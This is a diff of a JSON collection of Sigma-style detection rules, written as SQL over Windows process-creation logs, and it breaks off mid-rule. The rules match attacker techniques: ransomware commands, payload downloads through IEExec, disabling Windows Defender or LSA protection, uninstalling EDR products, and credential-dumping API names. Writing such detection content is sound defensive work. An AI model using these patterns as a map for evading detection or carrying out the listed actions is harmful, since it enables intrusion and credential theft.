A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine 
Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName 
LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine 
LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": 
"Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
+ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + 
"attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE 
'%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential 
process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 